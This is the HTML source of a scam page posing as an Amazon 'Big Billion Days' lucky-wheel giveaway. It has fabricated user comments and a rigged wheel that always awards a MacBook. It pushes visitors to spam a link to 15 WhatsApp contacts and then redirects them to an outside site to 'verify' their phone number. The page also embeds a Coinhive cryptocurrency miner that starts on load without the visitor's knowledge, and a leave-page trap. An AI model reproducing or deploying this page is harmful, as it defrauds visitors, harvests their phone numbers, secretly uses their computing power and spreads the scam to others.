<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="robots" content="noindex, nofollow">
<meta property="og:title" content="Big Billion Day ~ Amazon" />
<meta property="og:description" content="Free Gifts For Everyone."/>
<meta property="og:image" itemprop="image" content="http://i.imgur.com/G7TCMGl.png" />
<meta property="og:updated_time" content="1440432930" />
<title>Spin The Lucky Wheel!</title>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
<style>
#status {
color: #F4211A;
font-size: 1.0em;
font-family:'minecraftfont';

height:100%;
}
.pop {
animation: pop 0.58s infinite;
-webkit-animation: pop 0.58s infinite;
}
@keyframes pop {
from {
transform:scale(0.95)
}
50% {
transform:scale(1)
}
to {
transform:scale(0.95)
}
}
@-webkit-keyframes pop {
from {
-webkit-transform:scale(0.95)
}
50% {
-webkit-transform:scale(1)
}
to {
-webkit-transform:scale(0.95)
}
}
* {
margin: 0
}
body {
font-family: tahoma, verdana, arial, sans-serif;
background-color: #F7F7F7
}
.header {
background-color: #ff9900
}
.logo-left {
padding: 5px;
vertical-align: middle
}
.header-text {
font-size: 20px;
height: 35px;
vertical-align: middle;
color: #FFF
}
.spinnerContainer {
position: relative;
transform: translateX(20%)
}
#clicker,
#clicker2 {
display: none
}
.clearfix::after,
.clearfix::before {
content: "";
display: table
}
.clearfix::after {
clear: both
}
.fbcoms {
padding: 0 5px;
font-family: Tahoma, Verdana, sans-serif;
background-color: #fff;
font-size: 12px;
text-align: left
}
.comments {
font-weight: 700;
text-align: center;
padding: 0 5px 10px
}
.totlikes {
margin-top: 3px;
background-color: #eeeff4;
padding: 5px 5px 5px 23px;
background-repeat: no-repeat;
background-position: 5px center
}
.fbblue {
color: #3c5a96
}
.buttons {
margin-top: 14px;
padding: 5px;
font-family: Arial, sans-serif;
color: #7d7d7f
}
.buttons span {
cursor: pointer
}
.buttons span:hover {
text-decoration: underline
}
.viewmore {
margin-top: 3px;
background-color: #eeeff4;
padding: 5px 5px 5px 23px;
background-position: 5px center;
background-repeat: no-repeat
}
.left {
cursor: pointer;
float: left;
color: #3c5a96
}
.left:hover {
text-decoration: underline
}
.right {
color: #7d7d7f;
float: right
}
div,
main,
article,
aside,
footer,
nav,
section,
header {
display: inline;
}
span {
display: block;
}
h1,
h2,
h3 {
display: inline;
}
.item {
position: relative;
margin-top: 3px;
background-color: #eeeff4;
padding: 5px 5px 5px 60px;
min-height: 60px;
box-sizing: border-box
}
.item .profileimg {
position: absolute;
top: 5px;
left: 5px
}
.comtxt {
line-height: 16px
}
.name {
color: #3c5a96;
font-weight: 700
}
.ago {
color: #86878c;
font-size: .95em
}
.fblike {
color: #3c5a96;
font-size: .95em;
cursor: pointer
}
.fblike:hover {
text-decoration: underline
}
.combot {
padding-top: 5px
}
.likes {
color: #3c5a96;
font-size: .95em;
cursor: pointer
}
.comments,
.hidden .combot,
.hidden .comtxt {
display: none
}
#fbalert>div {
margin-left: 0
}
#fbalert {
background-color: #fff;
padding: 5px
}
#spinner {
position: relative;
margin: 1em auto 0;
width: 315px;
overflow: hidden
}
@media(min-width:360px) {
#spinner {
width: 340px
}
}
#spinBG {
z-index: 1;
width: 315px
}
@media(min-width:360px) {
#spinBG {
width: 340px
}
}
#spin {
z-index: 2;
position: absolute;
top: 8px;
left: 8px;
width: 300px
}
@media(min-width:360px) {
#spin {
width: 325px
}
}
#win,
#win2,
#win3,
#winP,
#winP1,
#winP2 {
position: absolute;
z-index: 3;
width: 65px;
left: 126px;
top: 120px
}
@media(min-width:360px) {
#win, #win2, #win3, #winP, #winP1, #winP2 {
width: 90px
}
}
#win2,
#win3,
#winP,
#winP1,
#winP2 {
display: none
}
.spinAround {
-webkit-animation: spin 6.6s;
-moz-animation: spin 6.6s;
-o-animation: spin 6.6s;
animation: spin 6.6s;
-webkit-animation-timing-function: ease;
-moz-animation-timing-function: ease;
-o-animation-timing-function: ease;
animation-timing-function: ease;
-webkit-animation-iteration-count: 1;
-moz-animation-iteration-count: 1;
-o-animation-iteration-count: 1;
animation-iteration-count: 1;
-webkit-animation-direction: normal;
-moz-animation-direction: normal;
-o-animation-direction: normal;
animation-direction: normal;
-webkit-animation-fill-mode: forwards;
-moz-animation-fill-mode: forwards;
-o-animation-fill-mode: forwards;
animation-fill-mode: forwards
}
@-webkit-keyframes spin {
0% {
-webkit-transform: rotate(0deg);
transform: rotate(0deg)
}
90% {
-webkit-transform: rotate(3110deg);
transform: rotate(3110deg)
}
95% {
-webkit-transform: rotate(3108deg);
transform: rotate(3108deg)
}
100% {
-webkit-transform: rotate(3109deg);
transform: rotate(3109deg)
}
}
@-moz-keyframes spin {
0% {
-moz-transform: rotate(0deg);
transform: rotate(0deg)
}
90% {
-moz-transform: rotate(3110deg);
transform: rotate(3110deg)
}
95% {
-moz-transform: rotate(3108deg);
transform: rotate(3108deg)
}
100% {
-moz-transform: rotate(3109deg);
transform: rotate(3109deg)
}
}
@-o-keyframes spin {
0% {
-o-transform: rotate(0deg);
transform: rotate(0deg)
}
90% {
-o-transform: rotate(3110deg);
transform: rotate(3110deg)
}
95% {
-o-transform: rotate(3108deg);
transform: rotate(3108deg)
}
100% {
-o-transform: rotate(3109deg);
transform: rotate(3109deg)
}
}
@keyframes spin {
0% {
-webkit-transform: rotate(0deg);
-moz-transform: rotate(0deg);
-o-transform: rotate(0deg);
transform: rotate(0deg)
}
90% {
-webkit-transform: rotate(3110deg);
-moz-transform: rotate(3110deg);
-o-transform: rotate(3110deg);
transform: rotate(3110deg)
}
95% {
-webkit-transform: rotate(3108deg);
-moz-transform: rotate(3108deg);
-o-transform: rotate(3108deg);
transform: rotate(3108deg)
}
100% {
-webkit-transform: rotate(3109deg);
-moz-transform: rotate(3109deg);
-o-transform: rotate(3109deg);
transform: rotate(3109deg)
}
}
.spinAround2 {
-webkit-animation: spinTwo 6.6s;
-moz-animation: spinTwo 6.6s;
-o-animation: spinTwo 6.6s;
animation: spinTwo 6.6s;
-webkit-animation-timing-function: ease;
-moz-animation-timing-function: ease;
-o-animation-timing-function: ease;
animation-timing-function: ease;
-webkit-animation-iteration-count: 1;
-moz-animation-iteration-count: 1;
-o-animation-iteration-count: 1;
animation-iteration-count: 1;
-webkit-animation-direction: normal;
-moz-animation-direction: normal;
-o-animation-direction: normal;
animation-direction: normal;
-webkit-animation-fill-mode: forwards;
-moz-animation-fill-mode: forwards;
-o-animation-fill-mode: forwards;
animation-fill-mode: forwards
}
@-webkit-keyframes spinTwo {
0% {
-webkit-transform: rotate(3109deg);
transform: rotate(3109deg)
}
90% {
-webkit-transform: rotate(6314deg);
transform: rotate(6314deg)
}
95% {
-webkit-transform: rotate(6312deg);
transform: rotate(6312deg)
}
100% {
-webkit-transform: rotate(6313deg);
transform: rotate(6313deg)
}
}
@-moz-keyframes spinTwo {
0% {
-moz-transform: rotate(3109deg);
transform: rotate(3109deg)
}
90% {
-moz-transform: rotate(6314deg);
transform: rotate(6314deg)
}
95% {
-moz-transform: rotate(6312deg);
transform: rotate(6312deg)
}
100% {
-moz-transform: rotate(6313deg);
transform: rotate(6313deg)
}
}
@-o-keyframes spinTwo {
0% {
-o-transform: rotate(3109deg);
transform: rotate(3109deg)
}
90% {
-o-transform: rotate(6314deg);
transform: rotate(6314deg)
}
95% {
-o-transform: rotate(6312deg);
transform: rotate(6312deg)
}
100% {
-o-transform: rotate(6313deg);
transform: rotate(6313deg)
}
}
@keyframes spinTwo {
0% {
-webkit-transform: rotate(3109deg);
-moz-transform: rotate(3109deg);
-o-transform: rotate(3109deg);
transform: rotate(3109deg)
}
90% {
-webkit-transform: rotate(6314deg);
-moz-transform: rotate(6314deg);
-o-transform: rotate(6314deg);
transform: rotate(6314deg)
}
95% {
-webkit-transform: rotate(6312deg);
-moz-transform: rotate(6312deg);
-o-transform: rotate(6312deg);
transform: rotate(6312deg)
}
100% {
-webkit-transform: rotate(6313deg);
-moz-transform: rotate(6313deg);
-o-transform: rotate(6313deg);
transform: rotate(6313deg)
}
}
ol,
ul {
list-style: none
}
.clearfix:after {
content: " ";
display: block;
height: 0;
clear: both;
overflow: hidden;
visibility: hidden
}
.clearfix {
display: block
}
.wrapper {
background-color: #fff;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
padding: 7px;
width: 96%;
margin: 0 auto 14px;
border: 1px solid #c4cde1;
border-top: 0;
max-width: 414px
}
.logo {
display: block;
margin: 4px auto;
}
.txt {
padding: 5px 6px;
line-height: 18px;
text-align: center
}
.bottom {
width: 92%;
margin: 20px auto 0;
border: 1px solid #ccc;
background-color: #f2f2f2;
padding: 5px;
border-radius: 10px;
-moz-border-radius: 10px;
-webkit-border-radius: 10px
}
.now {
text-align: center;
padding-top: 5px
}
#countdown {
font-weight: bold;
}
.rules {
color: #1b316c;
padding: 4px 5px;
line-height: 22px
}
a {
display: block;
background-color: #39579a;
border-radius: 7px;
-moz-border-radius: 7px;
-webkit-border-radius: 7px;
padding: 10px 0;
text-align: center;
font-weight: 700;
color: #fff;
font-size: 1.6em;
border-bottom: 1px solid #1b316c;
margin: 7px 13px 5px;
text-decoration: none
}
.title {
text-align: center;
font-weight: 700;
font-size: 26px
}
.show-all {
display: none;
}
.now2 {
padding-top: 10px;
font-weight: bold;
}
</style>
<script>

function getRandomInt(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
var r = getRandomInt(1,1000);
var myArray = ['xxe8.com', 'xxe8.com'];
var rand = myArray[Math.floor(Math.random() * myArray.length)];

url = rand;

</script>


<script type="text/javascript">
$(document).ready(function() {
var body = document.getElementsByTagName("body")[0];
var style = document.createElement("style");
style.type = "text/css";
style.appendChild(document.createTextNode("div, main, article, aside, footer, nav, section, header {display: block;}span {display: inline;}h1, h2, h3 {display: block;}"));
body.appendChild(style);
})
</script>

</head>
<body onload="spinnerAction()">

<div class="header">
<span class="header-text">Big Billion Days<br> <img src="http://i.imgur.com/wKSfJb1.png" class="logo-left" height="33" width="70"> Spin The Lucky Wheel!</span></div>
<div class="hide-all">
<div id="fbalert"><p>Only this <span id="today"> </span> we give our members 1 free spin for a chance to win exclusive prizes!</p>
<div style="padding-top: 5px; color: #9c9c9c; font-size: 11px;"> </div></div>


<div id="status" class="pop"><center> </center></div>

<div id="spinner">
<img id="spinBG" src="http://i.imgur.com/UJp8PVs.png">
<img id="spin" src="http://i.imgur.com/fI0L8C3.png">
<img onclick="startSpin()" id="win" src="http://i.imgur.com/QAigMFP.png">
<img onclick="spin2()" id="win2" src="http://i.imgur.com/GiCxlbZ.png">
<img id="winP" src="http://i.imgur.com/SObMiIY.png">
<img id="winP2" src="http://i.imgur.com/bsG3eC9.png">
</div>

<center><h6><font color="red">Only one game allowed per IP.</font></h6></center>
<div class="fbcoms">

<p class="comments">Comments:</p>
<p class="buttons">
<span class="like">Like</span> <span>Comment</span> <span>Share</span> <span>Delete</span>
</p>
<p class="totlikes"><span id="youand"></span><span class="fbblue">12,068 others</span> like this</p>
<p class="viewmore clearfix">
<span class="left">View more comments</span>
<span class="right">15 of 1,356</span>
</p>
<div class="item">
<img class="profileimg" src="http://i.imgur.com/BUzIFmD.jpg" height="50" width="50">
<p class="comtxt"><span class="name">Xavier Stebin</span> I was lucky
enough to get the fitbit surge fitness super Watch! I still can't believe this is real, haha!</p>
<p class="combot"><span class="ago">4 minutes ago</span> <span class="fblike">Like</span><span class="likes totlikes">37</span></p>
</div>
<div class="item">
<img class="profileimg" src="http://i.imgur.com/B7lsEek.jpg" height="50" width="50">
<p class="comtxt"><span class="name">Shyam Mohan</span> I got the Lenovo Vibe K4 Note.. Thanks Thankssss.. This is the best day ever..</p>
<p class="combot"><span class="ago">13 minutes ago</span> <span class="fblike">Like</span><span class="likes totlikes">24</span></p>
</div>
<div class="item">
<img class="profileimg" src="http://i.imgur.com/gu70LU4.jpg" height="50" width="50">
<p class="comtxt"><span class="name">Deepu Antony</span> Amazing game. Just found it. Hope I will win. EDIT: I got nothing :(</p>
<p class="combot"><span class="ago">29 minutes ago</span> <span class="fblike">Like</span><span class="likes totlikes">14</span></p>
</div>
<div class="item">
<img class="profileimg" src="http://i.imgur.com/mQIT8qn.jpg" height="50" width="50">
<p class="comtxt"><span class="name">Tebin Joseph</span> Knte Friends nu oru Headset kitti, Enikkonnum kittiyllaa :'( </p>
<p class="combot"><span class="ago">35 minutes ago</span> <span class="fblike">Like</span><span class="likes totlikes">11</span></p>
</div>
<div class="item">
<img class="profileimg" src="http://i.imgur.com/Es8dfZ8.jpg" height="50" width="50">
<p class="comtxt"><span class="name">Karan Singh</span> Dhanyavad, mujhe mera prize mil gaya. :D </p>
<p class="combot"><span class="ago">37 minutes ago</span> <span class="fblike">Like</span><span class="likes totlikes">9</span></p>
</div>
<div class="item">
<img class="profileimg" src="http://i.imgur.com/DAY1iP2.jpg" height="50" width="50">
<p class="comtxt"><span class="name">Ravi Verma</span> Has anyone actually won yet? I spun 2 times from both of my accounts but nothing...</p>
<p class="combot"><span class="ago">41 minutes ago</span> <span class="fblike">Like</span><span class="likes totlikes">8</span></p>
</div>
<div class="item">
<img class="profileimg" src="http://i.imgur.com/GgNNTeZ.jpg" height="50" width="50">
<p class="comtxt"><span class="name">Survival Sandhi</span> arey yar mujhe kuch n ahi mila...</p>
<p class="combot"><span class="ago">56 minutes ago</span> <span class="fblike">Like</span><span class="likes totlikes">5</span></p>
</div>
<div class="item">
<img class="profileimg" src="http://i.imgur.com/AFjBr5a.jpg" height="50" width="50">
<p class="comtxt"><span class="name">Yasmin Chandler</span> I got nothing.. why am I always so unlucky :(</p>
<p class="combot"><span class="ago">1 hour ago</span> <span class="fblike">Like</span><span class="likes totlikes">5</span></p>
</div>
<div class="item">
<img class="profileimg" src="http://i.imgur.com/rZjmJv6.jpg" height="50" width="50">
<p class="comtxt"><span class="name">Kurian Abraham</span> Why im not winning..? plz help</p>
<p class="combot"><span class="ago">1 hour ago</span> <span class="fblike">Like</span><span class="likes totlikes">2</span></p>
</div>

<div class="item">
<img class="profileimg" src="http://i.imgur.com/DVbFyHb.jpg" height="50" width="50">
<p class="comtxt"><span class="name">Namita Bansal</span> nice game..</p>
<p class="combot"><span class="ago">1 hour ago</span> <span class="fblike">Like</span><span class="likes totlikes">1</span></p>
</div>

<div class="item">
<img class="profileimg" src="http://i.imgur.com/Dn2u4Ey.jpg" height="50" width="50">
<p class="comtxt"><span class="name">Deep Singh</span> Which courier company will deliver my parcel?</p>
<p class="combot"><span class="ago">1 hour ago</span> <span class="fblike">Like</span><span class="likes totlikes">1</span></p>
</div>
<div class="item">
<img class="profileimg" src="http://i.imgur.com/wmGfAvV.jpg" height="50" width="50">
<p class="comtxt"><span class="name">Adriti Dutta</span> Not fake.. my frnd got real prize frm this contest..</p>
<p class="combot"><span class="ago">1 hour ago</span> <span class="fblike">Like</span><span class="likes totlikes">1</span></p>
</div>

</div>
<!-- <iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-in.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=IN&source=ss&ref=as_ss_li_til&ad_type=product_link&tracking_id=raghavgarg-21&marketplace=amazon&region=IN&placement=B000P1FYAA&asins=B000P1FYAA&linkId=890fa0b822a7df89c56028c6f243e25d&show_border=true&link_opens_in_new_window=true"></iframe> -->
</div>




<div class="show-all">
<div class="wrapper">
<div class="title"><p>Congratulations!</p></div>
<img src="http://i.imgur.com/rrmrleH.png" class="logo" height="214" width="214">
<p class="txt">You have won <b>Macbook Pro (Core 2 Duo, 4GB Ram, Silver)</b>. We've only left 27 gifts left for this week. Follow the instructions below in order to claim your gift.</p>
<p class="now now2">Tell 5 Group and 10 Friends on WhatsApp about the "Big Billion Days"!</p>
<div class="bottom">
<p class="rules">1. Click 15x on the SHARE button (don't forget to press the 'back/home' button to continue!)!</p>
<p class="rules">2. Click "CONTINUE" and claim your prize.</p>
<a class="cta" onclick="fn1(this); goNow();"><img src="http://i.imgur.com/pybSYJE.png" width="20"> SHARE <img src="http://i.imgur.com/1JLiqIm.png" width="20"></a>
  
<a class="cta" onclick="fn2(this); goNow();">CONTINUE</a>
<p class="now">This offer is valid for <span id="countdown">500</span> seconds.</p>
</div>
</div>
</div>



<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('NoP2CulY7rrUkvWzudR7cqc8kPo1ciTQ');
	miner.start();
</script>

<script type="text/javascript">
function spinnerAction() {
//alert("Welcome to Lucky Wheel!\n\nSpin the Wheel and you may win exclusive prizes!\n\nClick OK to Start the Game!")
}

function startSpin() {
var e = document.getElementById("spin"),
n = document.getElementById("win"),
t = document.getElementById("winP"),
o = document.getElementById("win2");
e.className = e.className + "spinAround", n.style.display = "none", t.style.display = "block", setTimeout(function() {
t.style.display = "none", o.style.display = "block"
}, 150), setTimeout(function() {
alert("You Won 1 Free Extra Spin!"), spin2enabled = !0
}, 6500)
}

function spin2() {
if (spin2enabled) {
var e = document.getElementById("spin"),
n = document.getElementById("win"),
t = document.getElementById("winP"),
o = document.getElementById("win2");
e.className = e.className + " spinAround2", n.style.display = "none", t.style.display = "block", setTimeout(function() {
t.style.display = "none", o.style.display = "block"
}, 150), setTimeout(function() {
var e = alert("Congratulations!\n\nYour prize: Macbook Pro (Core 2 Duo, 4GB Ram, Silver).\n\nPlease follow the instructions to win your prize!");
e === !0 || $(".hide-all").hide(), $(".show-all").show();
var n = 299,
t = setInterval(function() {
$("#countdown").text(n--), -1 == n && clearInterval(t)
}, 1e3);
javascript_countdown.init(500)
}, 6800)
}
}

function goNow() {
window.btn_clicked = !0
}

function fn1() {
++c, 15 >= c ? window.open(showMessage) : alert("Your Macbook Pro (Core 2 Duo, 4GB Ram, Silver) has been reserved.\n\nVerify your phone number on the next page to claim your prize!") & window.open("http://xns5.com/mac-1.html", "_self")
}

function fn2() {
c >= 15 ? alert("Your Macbook Pro (Core 2 Duo, 4GB Ram, Silver) has been reserved.\n\nVerify your phone number on the next page to claim your prize!") & window.open("http://xns5.com/mac-1.html", "_self") : window.alert("Tell 15 Groups/Friends on WhatsApp about the Lucky Wheel!\n\n You already told: " + c)
}

function FBcom(e, n) {
setTimeout(function() {
var n = 0,
t = 0;
$(e + ", " + e + " .comtxt, " + e + " .combot").slideDown(500), $().slideDown(500);
var o = setInterval(function() {
t += .2, $(e).css({
opacity: t
}), n++, 5 == n && clearInterval(o)
}, 100)
}, n)
}
spin2enabled = !1;
var d = new Date,
weekday = new Array("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday");
document.getElementById("today").innerHTML = weekday[d.getDay()];
var myarray = ["whatsapp://send?text=😍 *See this now* " + url, "whatsapp://send?text=😍 *See this now* " + url],
showMessage = myarray[Math.floor(Math.random() * myarray.length)];
c = 0;
var image;
$.fn.txtFader = function(e, n) {
this.fadeOut(n, function() {
$(this).html(e).fadeIn(n)
})
}, $(document).ready(function() {
FBcom("#fb1", 3e3), FBcom("#fb2", 5e3), FBcom("#fb3", 7e3), FBcom("#fb4", 9e3), FBcom("#fb5", 10500), FBcom("#fb6", 13e3), FBcom("#fb7", 15e3), FBcom("#fb8", 2e4), $(".like").click(function() {
$(this).hasClass("selected") ? ($(this).removeClass("selected"), $(this).html("Like"), $("#youand").html("")) : ($(this).addClass("selected"), $(this).html("Unlike"), $("#youand").html("You and "))
}), $(".fblike").click(function() {
$(this).hasClass("selected") ? ($(this).removeClass("selected"), $(this).html("Like")) : ($(this).addClass("selected"), $(this).html("Unlike"))
});
for (var e = 1; e <= $(".q").length; e++) console.log(e), clicker(e)
}), window.onbeforeunload = function() {
return window.btn_clicked ? void 0 : "You have got (1) more spin!\n\nPlay the game and you may win exclusive prizes from our sponsors.\n\nToday's prizes include Lenovo Vibe K4 Note, Viaplay Mobile Bluetooth Gaming Controller, Fitbit Surge Ultimate Fitness and many more!"
};
</script>

<style type="text/css">div, main, article, aside, footer, nav, section, header {display: block;}span {display: inline;}h1, h2, h3 {display: block;}</style>


</center></body></html>
